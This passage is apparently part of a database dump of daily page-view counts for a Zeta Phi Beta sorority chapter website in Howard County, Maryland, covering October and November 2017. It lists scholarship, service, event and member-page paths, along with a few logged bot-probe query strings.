ervice/breakfastonthego/','2017-10-07',1,772),('/service/','2017-10-07',1,247),('/ts_teams/jeaneathia-yerby-crowder/','2017-10-07',1,828),('/ts_teams/lillet-williams/','2017-10-07',1,823),('/ts_teams/cherice-daniel-2/','2017-10-07',2,825),('/scholarship/recommendation/','2017-10-07',1,1170),('/ts_teams/kathy-ball/','2017-10-07',3,887),('/download/constitution-by-laws/','2017-10-07',1,989),('/ts_teams/kalima-alawode/','2017-10-07',1,888),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-07',1,956),('/download/aarc/','2017-10-07',1,991),('/','2017-10-08',79,6),('/service/zen/','2017-10-08',26,786),('/membership/','2017-10-08',3,576),('/scholarship/','2017-10-08',2,797),('/history/','2017-10-08',2,190),('/scholarship/application/','2017-10-08',2,804),('/scholarship/recommendation/','2017-10-08',3,1170),('/service/youth/','2017-10-08',2,738),('/service/','2017-10-08',2,247),('/service/breakfastonthego/','2017-10-08',2,772),('/service/appa/','2017-10-08',2,781),('/event/making-strides-breast-cancer-walk/','2017-10-08',3,1185),('/event/breakfast-on-the-go/','2017-10-08',2,493),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-08',2,956),('/scholarship/soror-conway1/','2017-10-08',1,1179),('/scholarship/lgzscholarshipreleaseform/','2017-10-08',1,1173),('/cause/march-of-dimes/','2017-10-08',1,1023),('/download/aarc/','2017-10-08',1,991),('/download/constitution-by-laws/','2017-10-08',1,989),('/ts_teams/jeaneathia-yerby-crowder/','2017-10-08',1,828),('/ts_teams/cherice-daniel-2/','2017-10-08',1,825),('/ts_teams/lillet-williams-2/','2017-10-08',1,824),('/ts_teams/lillet-williams/','2017-10-08',1,823),('/ts_teams/constance-kinder/','2017-10-08',1,822),('/ts_teams/tamara-curtis/','2017-10-08',1,821),('/','2017-10-09',109,6),('/service/zen/','2017-10-09',16,786),('/membership/','2017-10-09',2,576),('/service/youth/','2017-10-09',1,738),('/scholarship/','2017-10-09',2,797),('/scholarship/recommendation/','2017-10-09',1,1170),('/history/','2017-10-09',1,190),('/?pwidget=3371&action=1','2017-10-09',1,6),('/','2017-10-10',70,6),('/membership/','2017-10-10',1,576),('/service/zen/','2017-10-10',20,786),('/scholarship/','2017-10-10',2,797),('/history/','2017-10-10',2,190),('/','2017-10-11',104,6),('/service/appa','2017-10-11',1,781),('/event/making-strides-breast-cancer-walk','2017-10-11',1,1185),('/scholarship/recommendation','2017-10-11',1,1170),('/event/making-strides-breast-cancer-walk/','2017-10-11',2,1185),('/service/appa/','2017-10-11',2,781),('/scholarship/recommendation/','2017-10-11',3,1170),('/service/breakfastonthego','2017-10-11',1,772),('/service/breakfastonthego/','2017-10-11',2,772),('/service/zen/','2017-10-11',14,786),('/login-2/','2017-10-11',1,657),('/history/','2017-10-11',4,190),('/scholarship/','2017-10-11',1,797),('/service/youth/','2017-10-11',1,738),('/scholarship/application/','2017-10-11',1,804),('/service/','2017-10-11',1,247),('/event/breakfast-on-the-go/','2017-10-11',1,493),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-11',1,956),('/','2017-10-12',137,6),('/event/making-strides-breast-cancer-walk/','2017-10-12',2,1185),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-12',2,956),('/history/','2017-10-12',3,190),('/scholarship/','2017-10-12',3,797),('/service/','2017-10-12',6,247),('/service/appa/','2017-10-12',3,781),('/service/youth/','2017-10-12',3,738),('/service/zen/','2017-10-12',24,786),('/scholarship/recommendation/','2017-10-12',2,1170),('/scholarship/application/','2017-10-12',2,804),('/service/breakfastonthego/','2017-10-12',1,772),('/event/breakfast-on-the-go/','2017-10-12',2,493),('/scholarship/soror-conway1/','2017-10-12',1,1179),('/scholarship/lgzscholarshipreleaseform/','2017-10-12',1,1173),('/cause/march-of-dimes/','2017-10-12',1,1023),('/download/constitution-by-laws/','2017-10-12',1,989),('/download/aarc/','2017-10-12',1,991),('/ts_teams/jeaneathia-yerby-crowder/','2017-10-12',1,828),('/ts_teams/cherice-daniel-2/','2017-10-12',1,825),('/ts_teams/lillet-williams-2/','2017-10-12',1,824),('/ts_teams/lillet-williams/','2017-10-12',1,823),('/ts_teams/constance-kinder/','2017-10-12',1,822),('/ts_teams/tamara-curtis/','2017-10-12',1,821),('/cause/marchofdimes-2/','2017-10-12',1,90),('/cause/scholarship/','2017-10-12',1,59),('/login-2/','2017-10-12',2,657),('/ts_teams/nathalia-drew/','2017-10-12',1,1084),('/ts_teams/kalima-alawode/','2017-10-12',1,888),('/ts_teams/kathy-ball/','2017-10-12',2,887),('/ts_teams/kathy-j-barrett/','2017-10-12',1,819),('/ts_teams/christy-lewis/','2017-10-12',1,818),('/ts_teams/dawn-j-kemp/','2017-10-12',2,817),('/ts_teams/crystal-whitaker/','2017-10-12',1,816),('/ts_teams/tracy-irvin/','2017-10-12',1,815),('/ts_teams/tamika-r-daniels/','2017-10-12',1,814),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-10-12',1,689),('/ts_slider/567/','2017-10-12',1,567),('/ts_teams/linda-brigmon/','2017-10-12',1,886),('/ts_teams/rose-matthews/','2017-10-12',1,870),('/event/breakfast-on-the-go','2017-10-12',1,493),('/','2017-10-13',119,6),('/scholarship/','2017-10-13',3,797),('/history/','2017-10-13',3,190),('/scholarship/application/','2017-10-13',2,804),('/scholarship/recommendation/','2017-10-13',2,1170),('/service/','2017-10-13',2,247),('/service/appa/','2017-10-13',2,781),('/service/breakfastonthego/','2017-10-13',1,772),('/service/youth/','2017-10-13',1,738),('/service/zen/','2017-10-13',21,786),('/event/breakfast-on-the-go/','2017-10-13',1,493),('/event/making-strides-breast-cancer-walk/','2017-10-13',3,1185),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-13',1,956),('/index.php','2017-10-13',1,6),('/','2017-10-14',200,6),('/service/zen/','2017-10-14',8,786),('/scholarship/','2017-10-14',2,797),('/service/appa/','2017-10-14',2,781),('/scholarship/application/','2017-10-14',1,804),('/history/','2017-10-14',1,190),('/scholarship/recommendation/','2017-10-14',1,1170),('/service/','2017-10-14',1,247),('/service/youth/','2017-10-14',1,738),('/service/breakfastonthego/','2017-10-14',1,772),('/event/breakfast-on-the-go/','2017-10-14',1,493),('/event/making-strides-breast-cancer-walk/','2017-10-14',1,1185),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-14',1,956),('/','2017-10-15',98,6),('/service/zen/','2017-10-15',22,786),('/history/','2017-10-15',5,190),('/scholarship/','2017-10-15',5,797),('/scholarship/application/','2017-10-15',3,804),('/scholarship/recommendation/','2017-10-15',3,1170),('/service/','2017-10-15',3,247),('/service/appa/','2017-10-15',2,781),('/service/youth/','2017-10-15',2,738),('/ts_teams/linda-price/','2017-10-16',1,867),('/service/zen/','2017-10-16',24,786),('/','2017-10-16',126,6),('/scholarship/','2017-10-16',3,797),('/history/','2017-10-16',8,190),('/ts_teams/dawn-j-kemp/','2017-10-16',1,817),('/ts_teams/rose-matthews/','2017-10-16',1,870),('/scholarship/application/','2017-10-16',2,804),('/scholarship/recommendation/','2017-10-16',2,1170),('/service/','2017-10-16',4,247),('/service/appa/','2017-10-16',3,781),('/service/breakfastonthego/','2017-10-16',2,772),('/service/youth/','2017-10-16',2,738),('/event/pearlette-amicette-club-susan-g-koman-pink/','2017-10-16',2,1188),('/event/making-strides-breast-cancer-walk/','2017-10-16',2,1185),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-16',2,956),('/scholarship/soror-conway1/','2017-10-16',1,1179),('/scholarship/lgzscholarshipreleaseform/','2017-10-16',1,1173),('/','2017-10-17',148,6),('/service/zen/','2017-10-17',22,786),('/index.php?testwork=ololo','2017-10-17',1,6),('/?testwork=ololo','2017-10-17',1,6),('/?pwidget=3371&action=1','2017-10-17',1,6),('/scholarship/','2017-10-17',1,797),('/service/','2017-10-17',4,247),('/service/appa/','2017-10-17',1,781),('/scholarship/application/','2017-10-17',1,804),('/','2017-10-18',109,6),('/service/','2017-10-18',1,247),('/history/','2017-10-18',1,190),('/service/zen/','2017-10-18',13,786),('/cause/scholarship/','2017-10-18',4,59),('/','2017-10-19',130,6),('/service/breakfastonthego/','2017-10-19',1,772),('/service/zen/','2017-10-19',18,786),('/history/','2017-10-19',1,190),('/','2017-10-20',121,6),('/service/zen/','2017-10-20',8,786),('/event/bsap-college-career-opportunity-night/','2017-10-20',1,1195),('/service/','2017-10-20',1,247),('/service/breakfastonthego/','2017-10-20',1,772),('/service/youth/','2017-10-20',1,738),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-20',1,956),('/scholarship/','2017-10-20',2,797),('/history/','2017-10-20',1,190),('/scholarship','2017-10-20',1,797),('/scholarship/application/','2017-10-20',1,804),('/','2017-10-21',155,6),('/scholarship/application/','2017-10-21',3,804),('/cause/march-of-dimes/','2017-10-21',3,1023),('/service/zen/','2017-10-21',1,786),('/history/','2017-10-21',1,190),('/scholarship/recommendation/','2017-10-21',1,1170),('/service/','2017-10-21',1,247),('/service/appa/','2017-10-21',1,781),('/service/breakfastonthego/','2017-10-21',1,772),('/login-2/','2017-10-21',2,657),('/','2017-10-22',106,6),('/login-2/','2017-10-22',1,657),('/event/bsap-college-career-opportunity-night/','2017-10-22',3,1195),('/download/constitution-by-laws/','2017-10-22',3,989),('/history/','2017-10-22',1,190),('/scholarship/','2017-10-22',2,797),('/scholarship/application/','2017-10-22',1,804),('/scholarship/recommendation/','2017-10-22',1,1170),('/service/','2017-10-22',1,247),('/service/appa/','2017-10-22',1,781),('/service/breakfastonthego/','2017-10-22',1,772),('/service/youth/','2017-10-22',1,738),('/service/zen/','2017-10-22',1,786),('/event/making-strides-breast-cancer-walk/','2017-10-22',1,1185),('/event/breakfast-on-the-go/','2017-10-22',1,493),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-22',1,956),('/scholarship/soror-conway1/','2017-10-22',1,1179),('/scholarship/lgzscholarshipreleaseform/','2017-10-22',1,1173),('/cause/march-of-dimes/','2017-10-22',1,1023),('/download/aarc/','2017-10-22',1,991),('/ts_teams/jeaneathia-yerby-crowder/','2017-10-22',1,828),('/ts_teams/cherice-daniel-2/','2017-10-22',1,825),('/ts_teams/lillet-williams-2/','2017-10-22',1,824),('/ts_teams/lillet-williams/','2017-10-22',1,823),('/ts_teams/constance-kinder/','2017-10-22',1,822),('/scholarship','2017-10-22',1,797),('/','2017-10-23',42,6),('/ts_teams/linda-price/','2017-10-23',2,867),('/event/bsap-college-career-opportunity-night/','2017-10-23',1,1195),('/service/breakfastonthego/','2017-10-23',1,772),('/event/chic-fil-spirit-night/','2017-10-23',1,1202),('/','2017-10-24',41,6),('/scholarship/','2017-10-24',3,797),('/scholarship','2017-10-24',2,797),('/?pwidget=3371&action=1','2017-10-24',7,6),('/','2017-10-25',45,6),('/event/bsap-college-career-opportunity-night','2017-10-25',1,1195),('/scholarship/recommendation','2017-10-25',1,1170),('/lgz-celebrates-35-years-service-howard-county-md','2017-10-25',1,956),('/scholarship','2017-10-25',1,797),('/event/adopt-a-highway','2017-10-25',1,1198),('/event/bsap-college-career-opportunity-night/','2017-10-25',3,1195),('/scholarship/recommendation/','2017-10-25',2,1170),('/scholarship/','2017-10-25',2,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-25',11,956),('/event/adopt-a-highway/','2017-10-25',2,1198),('/history/','2017-10-25',1,190),('/scholarship/application/','2017-10-25',1,804),('/service/','2017-10-25',1,247),('/service/zen/','2017-10-25',1,786),('/service/youth/','2017-10-25',1,738),('/service/appa/','2017-10-25',1,781),('/service/breakfastonthego/','2017-10-25',1,772),('/event/breakfast-on-the-go/','2017-10-25',1,493),('/event/chic-fil-spirit-night/','2017-10-25',1,1202),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-26',4,956),('/','2017-10-26',35,6),('/scholarship/','2017-10-26',5,797),('/service/','2017-10-26',2,247),('/service/appa/','2017-10-26',3,781),('/service/breakfastonthego/','2017-10-26',3,772),('/service/zen/','2017-10-26',2,786),('/scholarship/application/','2017-10-26',3,804),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-10-26',2,689),('/','2017-10-27',33,6),('/history/','2017-10-27',1,190),('/service/zen/','2017-10-27',1,786),('/service/breakfastonthego/','2017-10-27',1,772),('/','2017-10-28',36,6),('/event/bsap-college-career-opportunity-night','2017-10-28',1,1195),('/event/adopt-a-highway','2017-10-28',1,1198),('/scholarship','2017-10-28',1,797),('/scholarship/recommendation','2017-10-28',1,1170),('/lgz-celebrates-35-years-service-howard-county-md','2017-10-28',1,956),('/event/adopt-a-highway/','2017-10-28',2,1198),('/event/bsap-college-career-opportunity-night/','2017-10-28',2,1195),('/scholarship/','2017-10-28',2,797),('/scholarship/recommendation/','2017-10-28',2,1170),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-28',2,956),('/index.php?login=cmd','2017-10-28',1,6),('/?wc-ajax=get_refreshed_fragments','2017-10-28',1,6),('/history/','2017-10-28',4,190),('/scholarship/application/','2017-10-28',1,804),('/service/','2017-10-28',1,247),('/service/appa/','2017-10-28',1,781),('/service/zen/','2017-10-28',1,786),('/service/youth/','2017-10-28',1,738),('/service/breakfastonthego/','2017-10-28',1,772),('/event/breakfast-on-the-go/','2017-10-28',1,493),('/event/chic-fil-spirit-night/','2017-10-28',1,1202),('/','2017-10-29',34,6),('/?wc-ajax=get_refreshed_fragments','2017-10-29',4,6),('/service/','2017-10-29',1,247),('/history/','2017-10-29',1,190),('/','2017-10-30',38,6),('/user/','2017-10-30',1,547),('/?wc-ajax=get_refreshed_fragments','2017-10-30',7,6),('/history/','2017-10-30',5,190),('/service/appa/','2017-10-30',2,781),('/scholarship/','2017-10-30',1,797),('/scholarship/application/','2017-10-30',3,804),('/service/youth/','2017-10-30',6,738),('/service/breakfastonthego/','2017-10-30',2,772),('/?wc-ajax=get_refreshed_fragments','2017-10-31',10,6),('/','2017-10-31',24,6),('/ts_teams/sandra-hudson/','2017-10-31',1,875),('/scholarship/','2017-10-31',1,797),('/service/','2017-10-31',1,247),('/','2017-11-01',29,6),('/scholarship/','2017-11-01',2,797),('/history/','2017-11-01',2,190),('/scholarship/application/','2017-11-01',2,804),('/scholarship/recommendation/','2017-11-01',2,1170),('/service/','2017-11-01',2,247),('/service/appa/','2017-11-01',2,781),('/service/zen/','2017-11-01',2,786),('/service/youth/','2017-11-01',2,738),('/event/breakfast-on-the-go/','2017-11-01',1,493),('/service/breakfastonthego/','2017-11-01',2,772),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-01',1,956),('/event/adopt-a-highway/','2017-11-01',1,1198),('/event/chic-fil-spirit-night/','2017-11-01',1,1202),('/?wc-ajax=get_refreshed_fragments','2017-11-01',4,6),('/ts_teams/dawn-j-kemp/','2017-11-01',1,817),('/ts_teams/shanee-satchell/','2017-11-01',1,820),('/','2017-11-02',49,6),('/?wc-ajax=get_refreshed_fragments','2017-11-02',8,6),('/event/chic-fil-spirit-night/','2017-11-02',1,1202),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-02',1,956),('/scholarship/','2017-11-02',1,797),('/history/','2017-11-02',4,190),('/','2017-11-03',54,6),('/?wc-ajax=get_refreshed_fragments','2017-11-03',8,6),('/index.php','2017-11-03',3,6),('/index.php?abc11=123','2017-11-03',1,6),('/history/','2017-11-03',3,190),('/scholarship/','2017-11-03',1,797),('/service/youth/','2017-11-03',1,738),('/event/adopt-a-highway/','2017-11-03',1,1198),('/event/chic-fil-spirit-night/','2017-11-03',1,1202),('/service/appa/','2017-11-03',1,781),('/?wc-ajax=get_refreshed_fragments','2017-11-04',11,6),('/','2017-11-04',41,6),('/scholarship/application/','2017-11-04',1,804),('/scholarship/','2017-11-04',1,797),('/history/','2017-11-04',5,190),('/scholarship/recommendation/','2017-11-04',1,1170),('/service/','2017-11-04',1,247),('/service/appa/','2017-11-04',3,781),('/service/zen/','2017-11-04',1,786),('/service/breakfastonthego/','2017-11-04',1,772),('/service/youth/','2017-11-04',1,738),('/event/adopt-a-highway/','2017-11-04',1,1198),('/event/chic-fil-spirit-night/','2017-11-04',1,1202),('/event/breakfast-on-the-go/','2017-11-04',1,493),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-04',1,956),('/','2017-11-05',22,6),('/scholarship/application/','2017-11-05',1,804),('/service/','2017-11-05',1,247),('/service/appa/','2017-11-05',1,781),('/service/youth/','2017-11-05',1,738),('/service/zen/','2017-11-05',1,786),('/scholarship/','2017-11-05',3,797),('/?wc-ajax=get_refreshed_fragments','2017-11-05',3,6),('/scholarship/lgzscholarshipreleaseform/','2017-11-05',3,1173),('/','2017-11-06',47,6),('/history/','2017-11-06',6,190),('/scholarship/','2017-11-06',105,797),('/scholarship/application/','2017-11-06',4,804),('/scholarship/recommendation/','2017-11-06',4,1170),('/service/','2017-11-06',2,247),('/service/appa/','2017-11-06',4,781),('/service/breakfastonthego/','2017-11-06',2,772),('/service/youth/','2017-11-06',2,738),('/service/zen/','2017-11-06',1,786),('/event/chic-fil-spirit-night/','2017-11-06',2,1202),('/event/linus-blanket-project/','2017-11-06',1,1217),('/event/breakfast-on-the-go/','2017-11-06',1,493),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-06',1,956),('/scholarship/soror-conway1/','2017-11-06',1,1179),('/scholarship/lgzscholarshipreleaseform/','2017-11-06',2,1173),('/ts_teams/josephine-gross/','2017-11-06',1,1232),('/ts_teams/oretta-timmons/','2017-11-06',1,1230),('/ts_teams/yasmine-allen/','2017-11-06',1,1228),('/ts_teams/jelani-dula/','2017-11-06',1,1226),('/ts_teams/christopher-flowers/','2017-11-06',1,1224),('/ts_teams/journey-mcmillan/','2017-11-06',1,1222),('/ts_teams/nicholas-claud/','2017-11-06',1,1220),('/?wc-ajax=get_refreshed_fragments','2017-11-06',22,6),('/scholarship','2017-11-06',99,797),('/?=Submit&email=1&form_id=1&fs_postonce_1=987c77a901d023c2ed5f870af3b657fe,1509998996&fscf_submitted=1&full_name=1&mailto_id=1&message=1&si_contact_action=send','2017-11-06',1,6),('/?email=1&form_id=1&fs_postonce_1=987c77a901d023c2ed5f870af3b657fe%2C1509998996&fscf_submitted=1&full_name=1&mailto_id=1&message=1&si_contact_action=send','2017-11-06',1,6),('/scholarship','2017-11-07',70,797),('/scholarship/','2017-11-07',73,797),('/','2017-11-07',38,6),('/?wc-ajax=get_refreshed_fragments','2017-11-07',13,6),('/scholarship/lgzscholarshipreleaseform/','2017-11-07',1,1173),('/scholarship/application/','2017-11-07',2,804),('/service/','2017-11-07',1,247),('/history/','2017-11-07',1,190),('/scholarship/recommendation/','2017-11-07',1,1170),('/service/appa/','2017-11-07',1,781),('/service/breakfastonthego/','2017-11-07',1,772),('/service/youth/','2017-11-07',1,738),('/service/zen/','2017-11-07',1,786),('/scholarship','2017-11-08',16,797),('/scholarship/','2017-11-08',26,797),('/','2017-11-08',32,6),('/?wc-ajax=get_refreshed_fragments','2017-11-08',12,6),('/scholarship/application/','2017-11-08',3,804),('/scholarship/lgzscholarshipreleaseform/','2017-11-08',2,1173),('/history/','2017-11-08',1,190),('/event/chic-fil-spirit-night/','2017-11-08',1,1202),('/','2017-11-09',52,6),('/scholarship','2017-11-09',5,797),('/scholarship/recommendation','2017-11-09',1,1170),('/lgz-celebrates-35-years-service-howard-county-md','2017-11-09',1,956),('/event/nuts-bolts-understanding-college-financial-aid','2017-11-09',1,1234),('/scholarship/','2017-11-09',6,797),('/scholarship/recommendation/','2017-11-09',1,1170),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-09',1,956),('/event/nuts-bolts-understanding-college-financial-aid/','2017-11-09',1,1234),('/history/','2017-11-09',4,190),('/?wc-ajax=get_refreshed_fragments','2017-11-09',14,6),('/scholarship/application/','2017-11-09',3,804),('/','2017-11-10',25,6),('/scholarship/','2017-11-10',5,797),('/?wc-ajax=get_refreshed_fragments','2017-11-10',3,6),('/scholarship/application/','2017-11-10',2,804),('/scholarship','2017-11-10',5,797),('/history/','2017-11-10',2,190),('/service/breakfastonthego/','2017-11-10',1,772),('/service/youth/','2017-11-10',1,738),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-10',1,956),('/service/appa/','2017-11-10',1,781),('/ts_teams/shanee-satchell/','2017-11-10',1,820),('/scholarship','2017-11-11',7,797),('/scholarship/','2017-11-11',9,797),('/','2017-11-11',29,6),('/?wc-ajax=get_refreshed_fragments','2017-11-11',9,6),('/service/appa/','2017-11-11',2,781),('/service/','2017-11-11',3,247),('/service/breakfastonthego/','2017-11-11',1,772),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-11',1,956),('/service/youth/','2017-11-11',3,738),('/service/zen/','2017-11-11',2,786),('/history/','2017-11-11',3,190),('/event/linus-blanket-project/','2017-11-11',1,1217),('/scholarship/application/','2017-11-11',3,804),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-11-11',2,689),('/','2017-11-12',21,6),('/scholarship','2017-11-12',2,797),('/scholarship/','2017-11-12',2,797),('/ts_teams/rose-matthews/','2017-11-12',2,870),('/history/','2017-11-12',1,190),('/?wc-ajax=get_refreshed_fragments','2017-11-12',3,6),('/scholarship/application/','2017-11-12',1,804),('/','2017-11-13',25,6),('/?wc-ajax=get_refreshed_fragments','2017-11-13',12,6),('/event/nuts-bolts-understanding-college-financial-aid/','2017-11-13',8,1234),('/event/chic-fil-spirit-night/','2017-11-13',1,1202),('/history/','2017-11-13',2,190),('/event/nuts-bolts-understanding-college-financial-aid/?utm_content=buffer7ca7a&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer','2017-11-13',5,1234),('/event/nuts-bolts-understanding-college-financial-aid/?utm_content=buffer3cc40&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer','2017-11-13',3,1234),('/event/nuts-bolts-understanding-college-financial-aid/?utm_content=buffer3cc40','2017-11-13',1,1234),('/event/nuts-bolts-understanding-college-financial-aid/?utm_content=bufferc23f3&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer','2017-11-13',1,1234),('/scholarship','2017-11-13',1,797),('/scholarship/','2017-11-13',4,797),('/scholarship/application/','2017-11-13',4,804),('/scholarship/lgzscholarshipreleaseform/','2017-11-13',1,1173),('/','2017-11-14',39,6),('/scholarship','2017-11-14',1,797),('/scholarship/','2017-11-14',1,797),('/?wc-ajax=get_refreshed_fragments','2017-11-14',9,6),('/history/','2017-11-14',2,190),('/ts_teams/tracy-irvin/','2017-11-14',2,815),('/scholarship/application/','2017-11-14',2,804),('/event/nuts-bolts-understanding-college-financial-aid/?utm_content=buffer7ca7a&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer','2017-11-14',1,1234),('/service/appa/','2017-11-14',1,781),('/?wc-ajax=get_refreshed_fragments','2017-11-15',8,6),('/','2017-11-15',34,6),('/scholarship','2017-11-15',2,797),('/lgz-celebrates-35-years-service-howard-county-md','2017-11-15',1,956),('/event/hcc-career-links-free-store','2017-11-15',1,1239),('/event/nuts-bolts-understanding-college-financial-aid','2017-11-15',1,1234),('/scholarship/recommendation','2017-11-15',1,1170),('/scholarship/','2017-11-15',6,797),('/event/hcc-career-links-free-store/','2017-11-15',1,1239),('/event/nuts-bolts-understanding-college-financial-aid/','2017-11-15',1,1234),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-15',1,956),('/scholarship/recommendation/','2017-11-15',1,1170),('/service/','2017-11-15',1,247),('/service/youth/','2017-11-15',3,738),('/service/appa/','2017-11-15',1,781),('/scholarship/application/','2017-11-15',4,804),('/event/nuts-bolts-understanding-college-financial-aid/?utm_content=bufferc23f3&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer','2017-11-15',1,1234),('/','2017-11-16',26,6),('/ts_teams/shanee-satchell/','2017-11-16',1,820),('/?wc-ajax=get_refreshed_fragments','2017-11-16',6,6),('/scholarship/application/','2017-11-16',1,804),('/history/','2017-11-16',3,190),('/event/linus-blanket-project/','2017-11-16',1,1217),('/service/appa/','2017-11-16',1,781),('/','2017-11-17',21,6),('/?wc-ajax=get_refreshed_fragments','2017-11-17',9,6),('/scholarship/','2017-11-17',2,797),('/scholarship/application/','2017-11-17',2,804),('/history/','2017-11-17',1,190),('/ts_teams/kristin-clark/','2017-11-17',1,883),('/','2017-11-18',42,6),('/?wc-ajax=get_refreshed_fragments','2017-11-18',11,6),('/ts_teams/cherice-daniel-2/','2017-11-18',2,825),('/event/chic-fil-spirit-night/','2017-11-18',3,1202),('/scholarship/application/','2017-11-18',1,804),('/','2017-11-19',38,6),('/?wc-ajax=get_refreshed_fragments','2017-11-19',4,6),('/history/','2017-11-19',1,190),('/scholarship','2017-11-19',2,797),('/scholarship/','2017-11-19',2,797),('/ts_teams/cherice-daniel-2','2017-11-19',1,825),('/event/breakfast-on-the-go','2017-11-19',1,493),('/event/breakfast-on-the-go/','2017-11-19',1,493),('/ts_teams/cherice-daniel-2/','2017-11-19',1,825),('/lgz-celebrates-35-years-service-howard-county-md','2017-11-19',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-19',1,956),('/service/appa/','2017-11-19',1,781),('/scholarship/application/','2017-11-19',1,804),('/','2017-11-20',40,6),('/history/','2017-11-20',7,190),('/scholarship/','2017-11-20',5,797),('/scholarship/application/','2017-11-20',6,804),('/scholarship/recommendation/','2017-11-20',1,1170),('/service/','2017-11-20',1,247),('/service/appa/','2017-11-20',2,781),('/service/breakfastonthego/','2017-11-20',1,772),('/service/youth/','2017-11-20',1,738),('/service/zen/','2017-11-20',1,786),('/event/chic-fil-spirit-night/','2017-11-20',1,1202),('/event/hcc-career-links-free-store/','2017-11-20',1,1239),('/event/linus-blanket-project/','2017-11-20',3,1217),('/event/breakfast-on-the-go/','2017-11-20',1,493),('/event/nuts-bolts-understanding-college-financial-aid/','2017-11-20',1,1234),('/lgz-launches-new-college-preparation-workshops/','2017-11-20',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-20',1,956),('/scholarship/soror-conway1/','2017-11-20',1,1179),('/scholarship/lgzscholarshipreleaseform/','2017-11-20',1,1173),('/ts_teams/josephine-gross/','2017-11-20',1,1232),('/ts_teams/oretta-timmons/','2017-11-20',1,1230),('/ts_teams/yasmine-allen/','2017-11-20',3,1228),('/ts_teams/jelani-dula/','2017-11-20',1,1226),('/ts_teams/christopher-flowers/','2017-11-20',1,1224),('/ts_teams/journey-mcmillan/','2017-11-20',1,1222),('/ts_teams/nicholas-claud/','2017-11-20',1,1220),('/?wc-ajax=get_refreshed_fragments','2017-11-20',15,6),('/scholarship','2017-11-20',4,797),('/?wc-ajax=get_refreshed_fragments','2017-11-21',14,6),('/','2017-11-21',40,6),('/event/nuts-bolts-understanding-college-financial-aid/','2017-11-21',4,1234),('/event/hcc-career-links-free-store/','2017-11-21',1,1239),('/event/linus-blanket-project/','2017-11-21',3,1217),('/scholarship/application/','2017-11-21',1,804),('/service/appa/','2017-11-21',1,781),('/history/','2017-11-21',4,190),('/scholarship','2017-11-21',2,797),('/scholarship/','2017-11-21',2,797),('/index.php','2017-11-21',1,6),('/','2017-11-22',26,6),('/?wc-ajax=get_refreshed_fragments','2017-11-22',9,6),('/event/5th-annual-denim-pearlz-party/','2017-11-22',2,1249),('/event/hcc-career-links-free-store','2017-11-22',1,1239),('/event/hcc-career-links-free-store/','2017-11-22',1,1239),('/service/appa','2017-11-22',1,781),('/service/appa/','2017-11-22',3,781),('/event/nuts-bolts-understanding-college-financial-aid','2017-11-22',1,1234),('/event/nuts-bolts-understanding-college-financial-aid/','2017-11-22',1,1234),('/index.php','2017-11-22',1,6),('/history/','2017-11-22',1,190),('/scholarship/','2017-11-22',7,797),('/service/','2017-11-22',4,247),('/service/breakfastonthego/','2017-11-22',4,772),('/service/zen/','2017-11-22',1,786),('/scholarship/application/','2017-11-22',2,804),('/scholarship','2017-11-22',2,797),('/ts_teams/tamika-r-daniels/','2017-11-22',1,814),('/','2017-11-23',38,6),('/scholarship/application/','2017-11-23',2,804),('/scholarship/','2017-11-23',3,797),('/history/','2017-11-23',1,190),('/scholarship','2017-11-23',2,797),('/event/linus-blanket-project/','2017-11-23',1,1217),('/?wc-ajax=get_refreshed_fragments','2017-11-23',3,6),('/','2017-11-24',22,6),('/scholarship/','2017-11-24',6,797),('/?wc-ajax=get_refreshed_fragments','2017-11-24',8,6),('/scholarship','2017-11-24',4,797),('/scholarship/application/','2017-11-24',3,804),('/event/linus-blanket-project/','2017-11-24',1,1217),('/service/','2017-11-24',1,247),('/','2017-11-25',30,6),('/?wc-ajax=get_refreshed_fragments','2017-11-25',8,6),('/scholarship/application/','2017-11-25',2,804),('/scholarship','2017-11-25',1,797),('/scholarship/','2017-11-25',1,797),('/scholarship/recommendation/','2017-11-25',1,1170),('/lgz-celebrates-35-years-service-howard-county-md/','2017-11-25',2,956),('/service/','2017-11-25',1,247),('/event/linus-blanket-project/','2017-11-25',1,1217),('/history/','2017-11-25',1,190),('/','2017-11-26',135,6),('/index.php','2017-11-26',1,6),('/event/hcc-career-links-free-store/','2017-11-26',1,1239),('/service/appa/','2017-11-26',1,781),('/service/','2017-11-26',2,247),('/service/breakfastonthego/','2017-11-26',1,772),('/scholarship/application/','2017-11-26',2,804),('/ts_teams/lillet-williams-2/','2017-11-26',1,824),('/?wc-ajax=get_refreshed_fragments','2017-11-26',9,6),('/scholarship/','2017-11-26',2,797),('/scholarship/recommendation/','2017-11-26',1,1170),('/scholarship','2017-11-26',1,797),('/history/','2017-11-26',1,190),('/','2017-11-27',285,6),('/ts_teams/cassandra-dorsey/','2017-11-27',1,880),('/scholarship','2017-11-27',7,797),('/scholarship/','2017-11-27',7,797),('/scholarship/recommendation/','2017-11-27',2,1170),('/scholarship/application/','2017-11-27',6,804),('/?